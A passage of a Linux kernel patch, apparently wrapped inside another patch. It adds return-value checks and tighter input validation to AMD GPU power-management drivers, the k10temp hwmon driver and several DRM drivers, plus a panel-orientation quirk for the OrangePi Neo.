+ 	} else if (type == PP_OD_COMMIT_DPM_TABLE) {
+ 		if (size != 0) {
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
+index 750b7527bdf83..530888c475be1 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
+@@ -5639,7 +5639,7 @@ static int smu7_set_power_profile_mode(struct pp_hwmgr *hwmgr, long *input, uint
+ 	mode = input[size];
+ 	switch (mode) {
+ 	case PP_SMC_POWER_PROFILE_CUSTOM:
+-		if (size < 8 && size != 0)
++		if (size != 8 && size != 0)
+ 			return -EINVAL;
+ 		/* If only CUSTOM is passed in, use the saved values. Check
+ 		 * that we actually have a CUSTOM profile by ensuring that
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
+index eb744401e0567..7e11974208732 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
+@@ -584,6 +584,7 @@ static int smu8_init_uvd_limit(struct pp_hwmgr *hwmgr)
+ 				hwmgr->dyn_state.uvd_clock_voltage_dependency_table;
+ 	unsigned long clock = 0;
+ 	uint32_t level;
++	int ret;
+ 
+ 	if (NULL == table || table->count <= 0)
+ 		return -EINVAL;
+@@ -591,7 +592,9 @@ static int smu8_init_uvd_limit(struct pp_hwmgr *hwmgr)
+ 	data->uvd_dpm.soft_min_clk = 0;
+ 	data->uvd_dpm.hard_min_clk = 0;
+ 
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxUvdLevel, &level);
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxUvdLevel, &level);
++	if (ret)
++		return ret;
+ 
+ 	if (level < table->count)
+ 		clock = table->entries[level].vclk;
+@@ -611,6 +614,7 @@ static int smu8_init_vce_limit(struct pp_hwmgr *hwmgr)
+ 				hwmgr->dyn_state.vce_clock_voltage_dependency_table;
+ 	unsigned long clock = 0;
+ 	uint32_t level;
++	int ret;
+ 
+ 	if (NULL == table || table->count <= 0)
+ 		return -EINVAL;
+@@ -618,7 +622,9 @@ static int smu8_init_vce_limit(struct pp_hwmgr *hwmgr)
+ 	data->vce_dpm.soft_min_clk = 0;
+ 	data->vce_dpm.hard_min_clk = 0;
+ 
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxEclkLevel, &level);
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxEclkLevel, &level);
++	if (ret)
++		return ret;
+ 
+ 	if (level < table->count)
+ 		clock = table->entries[level].ecclk;
+@@ -638,6 +644,7 @@ static int smu8_init_acp_limit(struct pp_hwmgr *hwmgr)
+ 				hwmgr->dyn_state.acp_clock_voltage_dependency_table;
+ 	unsigned long clock = 0;
+ 	uint32_t level;
++	int ret;
+ 
+ 	if (NULL == table || table->count <= 0)
+ 		return -EINVAL;
+@@ -645,7 +652,9 @@ static int smu8_init_acp_limit(struct pp_hwmgr *hwmgr)
+ 	data->acp_dpm.soft_min_clk = 0;
+ 	data->acp_dpm.hard_min_clk = 0;
+ 
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxAclkLevel, &level);
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxAclkLevel, &level);
++	if (ret)
++		return ret;
+ 
+ 	if (level < table->count)
+ 		clock = table->entries[level].acpclk;
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
+index f8333410cc3e4..c4d81c0aa18ee 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
+@@ -355,13 +355,13 @@ static int vega10_odn_initial_default_setting(struct pp_hwmgr *hwmgr)
+ 	return 0;
+ }
+ 
+-static void vega10_init_dpm_defaults(struct pp_hwmgr *hwmgr)
++static int vega10_init_dpm_defaults(struct pp_hwmgr *hwmgr)
+ {
+ 	struct vega10_hwmgr *data = hwmgr->backend;
+-	int i;
+ 	uint32_t sub_vendor_id, hw_revision;
+ 	uint32_t top32, bottom32;
+ 	struct amdgpu_device *adev = hwmgr->adev;
++	int ret, i;
+ 
+ 	vega10_initialize_power_tune_defaults(hwmgr);
+ 
+@@ -486,9 +486,12 @@ static void vega10_init_dpm_defaults(struct pp_hwmgr *hwmgr)
+ 	if (data->registry_data.vr0hot_enabled)
+ 		data->smu_features[GNLD_VR0HOT].supported = true;
+ 
+-	smum_send_msg_to_smc(hwmgr,
++	ret = smum_send_msg_to_smc(hwmgr,
+ 			PPSMC_MSG_GetSmuVersion,
+ 			&hwmgr->smu_version);
++	if (ret)
++		return ret;
++
+ 		/* ACG firmware has major version 5 */
+ 	if ((hwmgr->smu_version & 0xff000000) == 0x5000000)
+ 		data->smu_features[GNLD_ACG].supported = true;
+@@ -506,10 +509,16 @@ static void vega10_init_dpm_defaults(struct pp_hwmgr *hwmgr)
+ 		data->smu_features[GNLD_PCC_LIMIT].supported = true;
+ 
+ 	/* Get the SN to turn into a Unique ID */
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumTop32, &top32);
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumBottom32, &bottom32);
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumTop32, &top32);
++	if (ret)
++		return ret;
++
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumBottom32, &bottom32);
++	if (ret)
++		return ret;
+ 
+ 	adev->unique_id = ((uint64_t)bottom32 << 32) | top32;
++	return 0;
+ }
+ 
+ #ifdef PPLIB_VEGA10_EVV_SUPPORT
+@@ -883,7 +892,9 @@ static int vega10_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ 
+ 	vega10_set_features_platform_caps(hwmgr);
+ 
+-	vega10_init_dpm_defaults(hwmgr);
++	result = vega10_init_dpm_defaults(hwmgr);
++	if (result)
++		return result;
+ 
+ #ifdef PPLIB_VEGA10_EVV_SUPPORT
+ 	/* Get leakage voltage based on leakage ID. */
+@@ -2354,15 +2365,20 @@ static int vega10_acg_enable(struct pp_hwmgr *hwmgr)
+ {
+ 	struct vega10_hwmgr *data = hwmgr->backend;
+ 	uint32_t agc_btc_response;
++	int ret;
+ 
+ 	if (data->smu_features[GNLD_ACG].supported) {
+ 		if (0 == vega10_enable_smc_features(hwmgr, true,
+ 					data->smu_features[GNLD_DPM_PREFETCHER].smu_feature_bitmap))
+ 			data->smu_features[GNLD_DPM_PREFETCHER].enabled = true;
+ 
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_InitializeAcg, NULL);
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_InitializeAcg, NULL);
++		if (ret)
++			return ret;
+ 
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_RunAcgBtc, &agc_btc_response);
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_RunAcgBtc, &agc_btc_response);
++		if (ret)
++			agc_btc_response = 0;
+ 
+ 		if (1 == agc_btc_response) {
+ 			if (1 == data->acg_loop_state)
+@@ -2575,8 +2591,11 @@ static int vega10_init_smc_table(struct pp_hwmgr *hwmgr)
+ 		}
+ 	}
+ 
+-	pp_atomfwctrl_get_voltage_table_v4(hwmgr, VOLTAGE_TYPE_VDDC,
++	result = pp_atomfwctrl_get_voltage_table_v4(hwmgr, VOLTAGE_TYPE_VDDC,
+ 			VOLTAGE_OBJ_SVID2,  &voltage_table);
++	PP_ASSERT_WITH_CODE(!result,
++			"Failed to get voltage table!",
++			return result);
+ 	pp_table->MaxVidStep = voltage_table.max_vid_step;
+ 
+ 	pp_table->GfxDpmVoltageMode =
+@@ -3914,11 +3933,14 @@ static int vega10_get_gpu_power(struct pp_hwmgr *hwmgr,
+ 		uint32_t *query)
+ {
+ 	uint32_t value;
++	int ret;
+ 
+ 	if (!query)
+ 		return -EINVAL;
+ 
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetCurrPkgPwr, &value);
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetCurrPkgPwr, &value);
++	if (ret)
++		return ret;
+ 
+ 	/* SMC returning actual watts, keep consistent with legacy asics, low 8 bit as 8 fractional bits */
+ 	*query = value << 8;
+@@ -4814,14 +4836,16 @@ static int vega10_print_clock_levels(struct pp_hwmgr *hwmgr,
+ 	uint32_t gen_speed, lane_width, current_gen_speed, current_lane_width;
+ 	PPTable_t *pptable = &(data->smc_state_table.pp_table);
+ 
+-	int i, now, size = 0, count = 0;
++	int i, ret, now,  size = 0, count = 0;
+ 
+ 	switch (type) {
+ 	case PP_SCLK:
+ 		if (data->registry_data.sclk_dpm_key_disabled)
+ 			break;
+ 
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetCurrentGfxclkIndex, &now);
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetCurrentGfxclkIndex, &now);
++		if (ret)
++			break;
+ 
+ 		if (hwmgr->pp_one_vf &&
+ 		    (hwmgr->dpm_level == AMD_DPM_FORCED_LEVEL_PROFILE_PEAK))
+@@ -4837,7 +4861,9 @@ static int vega10_print_clock_levels(struct pp_hwmgr *hwmgr,
+ 		if (data->registry_data.mclk_dpm_key_disabled)
+ 			break;
+ 
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetCurrentUclkIndex, &now);
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetCurrentUclkIndex, &now);
++		if (ret)
++			break;
+ 
+ 		for (i = 0; i < mclk_table->count; i++)
+ 			size += sprintf(buf + size, "%d: %uMhz %s\n",
+@@ -4848,7 +4874,9 @@ static int vega10_print_clock_levels(struct pp_hwmgr *hwmgr,
+ 		if (data->registry_data.socclk_dpm_key_disabled)
+ 			break;
+ 
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetCurrentSocclkIndex, &now);
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetCurrentSocclkIndex, &now);
++		if (ret)
++			break;
+ 
+ 		for (i = 0; i < soc_table->count; i++)
+ 			size += sprintf(buf + size, "%d: %uMhz %s\n",
+@@ -4859,8 +4887,10 @@ static int vega10_print_clock_levels(struct pp_hwmgr *hwmgr,
+ 		if (data->registry_data.dcefclk_dpm_key_disabled)
+ 			break;
+ 
+-		smum_send_msg_to_smc_with_parameter(hwmgr,
++		ret = smum_send_msg_to_smc_with_parameter(hwmgr,
+ 				PPSMC_MSG_GetClockFreqMHz, CLK_DCEFCLK, &now);
++		if (ret)
++			break;
+ 
+ 		for (i = 0; i < dcef_table->count; i++)
+ 			size += sprintf(buf + size, "%d: %uMhz %s\n",
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega12_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega12_hwmgr.c
+index 1069eaaae2f82..e4948a1184752 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega12_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega12_hwmgr.c
+@@ -294,12 +294,12 @@ static int vega12_set_features_platform_caps(struct pp_hwmgr *hwmgr)
+ 	return 0;
+ }
+ 
+-static void vega12_init_dpm_defaults(struct pp_hwmgr *hwmgr)
++static int vega12_init_dpm_defaults(struct pp_hwmgr *hwmgr)
+ {
+ 	struct vega12_hwmgr *data = (struct vega12_hwmgr *)(hwmgr->backend);
+ 	struct amdgpu_device *adev = hwmgr->adev;
+ 	uint32_t top32, bottom32;
+-	int i;
++	int i, ret;
+ 
+ 	data->smu_features[GNLD_DPM_PREFETCHER].smu_feature_id =
+ 			FEATURE_DPM_PREFETCHER_BIT;
+@@ -365,10 +365,16 @@ static void vega12_init_dpm_defaults(struct pp_hwmgr *hwmgr)
+ 	}
+ 
+ 	/* Get the SN to turn into a Unique ID */
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumTop32, &top32);
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumBottom32, &bottom32);
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumTop32, &top32);
++	if (ret)
++		return ret;
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumBottom32, &bottom32);
++	if (ret)
++		return ret;
+ 
+ 	adev->unique_id = ((uint64_t)bottom32 << 32) | top32;
++
++	return 0;
+ }
+ 
+ static int vega12_set_private_data_based_on_pptable(struct pp_hwmgr *hwmgr)
+@@ -411,7 +417,11 @@ static int vega12_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ 
+ 	vega12_set_features_platform_caps(hwmgr);
+ 
+-	vega12_init_dpm_defaults(hwmgr);
++	result = vega12_init_dpm_defaults(hwmgr);
++	if (result) {
++		pr_err("%s failed\n", __func__);
++		return result;
++	}
+ 
+ 	/* Parse pptable data read from VBIOS */
+ 	vega12_set_private_data_based_on_pptable(hwmgr);
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
+index ff77a3683efd5..89f1ed7d08c26 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
+@@ -329,12 +329,12 @@ static int vega20_set_features_platform_caps(struct pp_hwmgr *hwmgr)
+ 	return 0;
+ }
+ 
+-static void vega20_init_dpm_defaults(struct pp_hwmgr *hwmgr)
++static int vega20_init_dpm_defaults(struct pp_hwmgr *hwmgr)
+ {
+ 	struct vega20_hwmgr *data = (struct vega20_hwmgr *)(hwmgr->backend);
+ 	struct amdgpu_device *adev = hwmgr->adev;
+ 	uint32_t top32, bottom32;
+-	int i;
++	int i, ret;
+ 
+ 	data->smu_features[GNLD_DPM_PREFETCHER].smu_feature_id =
+ 			FEATURE_DPM_PREFETCHER_BIT;
+@@ -405,10 +405,17 @@ static void vega20_init_dpm_defaults(struct pp_hwmgr *hwmgr)
+ 	}
+ 
+ 	/* Get the SN to turn into a Unique ID */
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumTop32, &top32);
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumBottom32, &bottom32);
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumTop32, &top32);
++	if (ret)
++		return ret;
++
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumBottom32, &bottom32);
++	if (ret)
++		return ret;
+ 
+ 	adev->unique_id = ((uint64_t)bottom32 << 32) | top32;
++
++	return 0;
+ }
+ 
+ static int vega20_set_private_data_based_on_pptable(struct pp_hwmgr *hwmgr)
+@@ -428,6 +435,7 @@ static int vega20_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ {
+ 	struct vega20_hwmgr *data;
+ 	struct amdgpu_device *adev = hwmgr->adev;
++	int result;
+ 
+ 	data = kzalloc(sizeof(struct vega20_hwmgr), GFP_KERNEL);
+ 	if (data == NULL)
+@@ -453,8 +461,11 @@ static int vega20_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ 
+ 	vega20_set_features_platform_caps(hwmgr);
+ 
+-	vega20_init_dpm_defaults(hwmgr);
+-
++	result = vega20_init_dpm_defaults(hwmgr);
++	if (result) {
++		pr_err("%s failed\n", __func__);
++		return result;
++	}
+ 	/* Parse pptable data read from VBIOS */
+ 	vega20_set_private_data_based_on_pptable(hwmgr);
+ 
+@@ -4084,9 +4095,11 @@ static int vega20_set_power_profile_mode(struct pp_hwmgr *hwmgr, long *input, ui
+ 	if (power_profile_mode == PP_SMC_POWER_PROFILE_CUSTOM) {
+ 		struct vega20_hwmgr *data =
+ 			(struct vega20_hwmgr *)(hwmgr->backend);
+-		if (size == 0 && !data->is_custom_profile_set)
++
++		if (size != 10 && size != 0)
+ 			return -EINVAL;
+-		if (size < 10 && size != 0)
++
++		if (size == 0 && !data->is_custom_profile_set)
+ 			return -EINVAL;
+ 
+ 		result = vega20_get_activity_monitor_coeff(hwmgr,
+@@ -4148,6 +4161,8 @@ static int vega20_set_power_profile_mode(struct pp_hwmgr *hwmgr, long *input, ui
+ 			activity_monitor.Fclk_PD_Data_error_coeff = input[8];
+ 			activity_monitor.Fclk_PD_Data_error_rate_coeff = input[9];
+ 			break;
++		default:
++			return -EINVAL;
+ 		}
+ 
+ 		result = vega20_set_activity_monitor_coeff(hwmgr,
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/smumgr/vega10_smumgr.c b/drivers/gpu/drm/amd/pm/powerplay/smumgr/vega10_smumgr.c
+index a70d738966490..f9c0f117725dd 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/smumgr/vega10_smumgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/smumgr/vega10_smumgr.c
+@@ -130,13 +130,17 @@ int vega10_get_enabled_smc_features(struct pp_hwmgr *hwmgr,
+ 			    uint64_t *features_enabled)
+ {
+ 	uint32_t enabled_features;
++	int ret;
+ 
+ 	if (features_enabled == NULL)
+ 		return -EINVAL;
+ 
+-	smum_send_msg_to_smc(hwmgr,
++	ret = smum_send_msg_to_smc(hwmgr,
+ 			PPSMC_MSG_GetEnabledSmuFeatures,
+ 			&enabled_features);
++	if (ret)
++		return ret;
++
+ 	*features_enabled = enabled_features;
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
+index ed2112efc6c68..286f4f9bfa352 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
+@@ -1215,19 +1215,22 @@ static int navi10_get_current_clk_freq_by_table(struct smu_context *smu,
+ 					   value);
+ }
+ 
+-static bool navi10_is_support_fine_grained_dpm(struct smu_context *smu, enum smu_clk_type clk_type)
++static int navi10_is_support_fine_grained_dpm(struct smu_context *smu, enum smu_clk_type clk_type)
+ {
+ 	PPTable_t *pptable = smu->smu_table.driver_pptable;
+ 	DpmDescriptor_t *dpm_desc = NULL;
+-	uint32_t clk_index = 0;
++	int clk_index = 0;
+ 
+ 	clk_index = smu_cmn_to_asic_specific_index(smu,
+ 						   CMN2ASIC_MAPPING_CLK,
+ 						   clk_type);
++	if (clk_index < 0)
++		return clk_index;
++
+ 	dpm_desc = &pptable->DpmDescriptor[clk_index];
+ 
+ 	/* 0 - Fine grained DPM, 1 - Discrete DPM */
+-	return dpm_desc->SnapToDiscrete == 0;
++	return dpm_desc->SnapToDiscrete == 0 ? 1 : 0;
+ }
+ 
+ static inline bool navi10_od_feature_is_supported(struct smu_11_0_overdrive_table *od_table, enum SMU_11_0_ODFEATURE_CAP cap)
+@@ -1283,7 +1286,11 @@ static int navi10_emit_clk_levels(struct smu_context *smu,
+ 		if (ret)
+ 			return ret;
+ 
+-		if (!navi10_is_support_fine_grained_dpm(smu, clk_type)) {
++		ret = navi10_is_support_fine_grained_dpm(smu, clk_type);
++		if (ret < 0)
++			return ret;
++
++		if (!ret) {
+ 			for (i = 0; i < count; i++) {
+ 				ret = smu_v11_0_get_dpm_freq_by_index(smu,
+ 								      clk_type, i, &value);
+@@ -1492,7 +1499,11 @@ static int navi10_print_clk_levels(struct smu_context *smu,
+ 		if (ret)
+ 			return size;
+ 
+-		if (!navi10_is_support_fine_grained_dpm(smu, clk_type)) {
++		ret = navi10_is_support_fine_grained_dpm(smu, clk_type);
++		if (ret < 0)
++			return ret;
++
++		if (!ret) {
+ 			for (i = 0; i < count; i++) {
+ 				ret = smu_v11_0_get_dpm_freq_by_index(smu, clk_type, i, &value);
+ 				if (ret)
+@@ -1661,7 +1672,11 @@ static int navi10_force_clk_levels(struct smu_context *smu,
+ 	case SMU_UCLK:
+ 	case SMU_FCLK:
+ 		/* There is only 2 levels for fine grained DPM */
+-		if (navi10_is_support_fine_grained_dpm(smu, clk_type)) {
++		ret = navi10_is_support_fine_grained_dpm(smu, clk_type);
++		if (ret < 0)
++			return ret;
++
++		if (ret) {
+ 			soft_max_level = (soft_max_level >= 1 ? 1 : 0);
+ 			soft_min_level = (soft_min_level >= 1 ? 1 : 0);
+ 		}
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/vangogh_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/vangogh_ppt.c
+index 1b731a9c92d93..c9c0aa6376e38 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/vangogh_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/vangogh_ppt.c
+@@ -1003,6 +1003,18 @@ static int vangogh_get_dpm_ultimate_freq(struct smu_context *smu,
+ 		}
+ 	}
+ 	if (min) {
++		ret = vangogh_get_profiling_clk_mask(smu,
++						     AMD_DPM_FORCED_LEVEL_PROFILE_MIN_MCLK,
++						     NULL,
++						     NULL,
++						     &mclk_mask,
++						     &fclk_mask,
++						     &soc_mask);
++		if (ret)
++			goto failed;
++
++		vclk_mask = dclk_mask = 0;
++
+ 		switch (clk_type) {
+ 		case SMU_UCLK:
+ 		case SMU_MCLK:
+@@ -2363,6 +2375,8 @@ static u32 vangogh_set_gfxoff_residency(struct smu_context *smu, bool start)
+ 
+ 	ret = smu_cmn_send_smc_msg_with_param(smu, SMU_MSG_LogGfxOffResidency,
+ 					      start, &residency);
++	if (ret)
++		return ret;
+ 
+ 	if (!start)
+ 		adev->gfx.gfx_off_residency = residency;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/aldebaran_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/aldebaran_ppt.c
+index cd8b0ab0112ae..c79bff02a31a0 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/aldebaran_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/aldebaran_ppt.c
+@@ -1939,7 +1939,8 @@ static int aldebaran_mode2_reset(struct smu_context *smu)
+ 
+ 	index = smu_cmn_to_asic_specific_index(smu, CMN2ASIC_MAPPING_MSG,
+ 						SMU_MSG_GfxDeviceDriverReset);
+-
++	if (index < 0 )
++		return -EINVAL;
+ 	mutex_lock(&smu->message_lock);
+ 	if (smu_version >= 0x00441400) {
+ 		ret = smu_cmn_send_msg_without_waiting(smu, (uint16_t)index, SMU_RESET_MODE_2);
+diff --git a/drivers/gpu/drm/bridge/tc358767.c b/drivers/gpu/drm/bridge/tc358767.c
+index 926ab5c3c31ab..0af2bd8706e44 100644
+--- a/drivers/gpu/drm/bridge/tc358767.c
++++ b/drivers/gpu/drm/bridge/tc358767.c
+@@ -1841,7 +1841,7 @@ static irqreturn_t tc_irq_handler(int irq, void *arg)
+ 		dev_err(tc->dev, "syserr %x\n", stat);
+ 	}
+ 
+-	if (tc->hpd_pin >= 0 && tc->bridge.dev) {
++	if (tc->hpd_pin >= 0 && tc->bridge.dev && tc->aux.drm_dev) {
+ 		/*
+ 		 * H is triggered when the GPIO goes high.
+ 		 *
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 5db52d6c5c35c..039da0d1a613b 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -414,6 +414,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "ONE XPLAYER"),
+ 		},
+ 		.driver_data = (void *)&lcd1600x2560_leftside_up,
++	}, {	/* OrangePi Neo */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "OrangePi"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "NEO-01"),
++		},
++		.driver_data = (void *)&lcd1200x1920_rightside_up,
+ 	}, {	/* Samsung GalaxyBook 10.6 */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "SAMSUNG ELECTRONICS CO., LTD."),
+diff --git a/drivers/gpu/drm/meson/meson_plane.c b/drivers/gpu/drm/meson/meson_plane.c
+index 815dfe30492b6..b43ac61201f31 100644
+--- a/drivers/gpu/drm/meson/meson_plane.c
++++ b/drivers/gpu/drm/meson/meson_plane.c
+@@ -534,6 +534,7 @@ int meson_plane_create(struct meson_drm *priv)
+ 	struct meson_plane *meson_plane;
+ 	struct drm_plane *plane;
+ 	const uint64_t *format_modifiers = format_modifiers_default;
++	int ret;
+ 
+ 	meson_plane = devm_kzalloc(priv->drm->dev, sizeof(*meson_plane),
+ 				   GFP_KERNEL);
+@@ -548,12 +549,16 @@ int meson_plane_create(struct meson_drm *priv)
+ 	else if (meson_vpu_is_compatible(priv, VPU_COMPATIBLE_G12A))
+ 		format_modifiers = format_modifiers_afbc_g12a;
+ 
+-	drm_universal_plane_init(priv->drm, plane, 0xFF,
+-				 &meson_plane_funcs,
+-				 supported_drm_formats,
+-				 ARRAY_SIZE(supported_drm_formats),
+-				 format_modifiers,
+-				 DRM_PLANE_TYPE_PRIMARY, "meson_primary_plane");
++	ret = drm_universal_plane_init(priv->drm, plane, 0xFF,
++					&meson_plane_funcs,
++					supported_drm_formats,
++					ARRAY_SIZE(supported_drm_formats),
++					format_modifiers,
++					DRM_PLANE_TYPE_PRIMARY, "meson_primary_plane");
++	if (ret) {
++		devm_kfree(priv->drm->dev, meson_plane);
++		return ret;
++	}
+ 
+ 	drm_plane_helper_add(plane, &meson_plane_helper_funcs);
+ 
+diff --git a/drivers/hwmon/k10temp.c b/drivers/hwmon/k10temp.c
+index 43aa955ec120d..74a4901640346 100644
+--- a/drivers/hwmon/k10temp.c
++++ b/drivers/hwmon/k10temp.c
+@@ -153,8 +153,9 @@ static void read_tempreg_nb_f15(struct pci_dev *pdev, u32 *regval)
+ 
+ static void read_tempreg_nb_zen(struct pci_dev *pdev, u32 *regval)
+ {
+-	amd_smn_read(amd_pci_dev_to_node_id(pdev),
+-		     ZEN_REPORTED_TEMP_CTRL_BASE, regval);
++	if (amd_smn_read(amd_pci_dev_to_node_id(pdev),
++			 ZEN_REPORTED_TEMP_CTRL_BASE, regval))
++		*regval = 0;
+ }
+ 
+ static long get_raw_temp(struct k10temp_data *data)
+@@ -205,6 +206,7 @@ static int k10temp_read_temp(struct device *dev, u32 attr, int channel,
+ 			     long *val)
+ {
+ 	struct k10temp_data *data = dev_get_drvdata(dev);
++	int ret = -EOPNOTSUPP;
+ 	u32 regval;
+ 
+ 	switch (attr) {
+@@ -221,13 +223,17 @@ static int k10temp_read_temp(struct device *dev, u32 attr, int channel,
+ 				*val = 0;
+ 			break;
+ 		case 2 ... 13:		/* Tccd{1-12} */
+-			amd_smn_read(amd_pci_dev_to_node_id(data->pdev),
+-				     ZEN_CCD_TEMP(data->ccd_offset, channel - 2),
+-						  &regval);
++			ret = amd_smn_read(amd_pci_dev_to_node_id(data->pdev),
++					   ZEN_CCD_TEMP(data->ccd_offset, channel - 2),
++					   &regval);
++
++			if (ret)
++				return ret;
++
+ 			*val = (regval & ZEN_CCD_TEMP_MASK) * 125 - 49000;
+ 			break;
+ 		default:
+-			return -EOPNOTSUPP;
++			return ret;
+ 		}
+ 		break;
+ 	case hwmon_temp_max:
+@@ -243,7 +249,7 @@ static int k10temp_read_temp(struct device *dev, u32 attr, int channel,
+ 			- ((regval >> 24) & 0xf)) * 500 + 52000;
+ 		break;
+ 	default:
+-		return -EOPNOTSUPP;
++		return ret;
+ 	}
+ 	return 0;
+ }
+@@ -381,8 +387,20 @@ static void k10temp_get_ccd_support(struct pci_dev *pdev,
+ 	int i;
+ 
+ 	for (i = 0; i < limit; i++) {
+-		amd_smn_read(amd_pci_dev_to_node_id(pdev),
+-			     ZEN_CCD_TEMP(data->ccd_offset, i), &regval);
++		/*
++		 * Ignore inaccessible CCDs.
++		 *
++		 * Some systems will return a register value of 0, and the TEMP_VALID
++		 * bit check below will naturally fail.
++		 *
++		 * Other systems will return a PCI_ERROR_RESPONSE (0xFFFFFFFF) for
++		 * the register value. And this will incorrectly pass the TEMP_VALID
++		 * bit check.
++		 */
++		if (amd_smn_read(amd_pci_dev_to_node_id(pdev),
++				 ZEN_CCD_TEMP(data->ccd_offset, i), &regval))
++			continue;
++
+ 		if (regval & ZEN_CCD_TEMP_VALID)
+ 			data->show_temp |= BIT(TCCD_BIT(i));
+ 	}
+diff --git a/drivers/hwspinlock/hwspinlock_core.c b/drivers/hwspinlock/hwspinlock_core.c
+index fd5f5c5a5244d..425597151dd3e 100644
+--- a/drivers/hwspinlock/hwspinlock_core.c
++++ b/drivers/hwspinlock/hwspinlock_core.c
+@@ -302,6 +302,34 @@ void __hwspin_unlock(struct hwspinlock *hwlock, int mode, unsigned long *flags)
+ }
+ EXPORT_SYMBOL_GPL(__hwspin_unlock);
+ 
++/**
++ * hwspin_lock_bust() - bust a specific hwspinlock
++ * @hwlock: a previously-acquired hwspinlock which we want to bust
++ * @id: identifier of the remote lock holder, if applicable
++ *
++ * This function will bust a hwspinlock that was previously acquired as
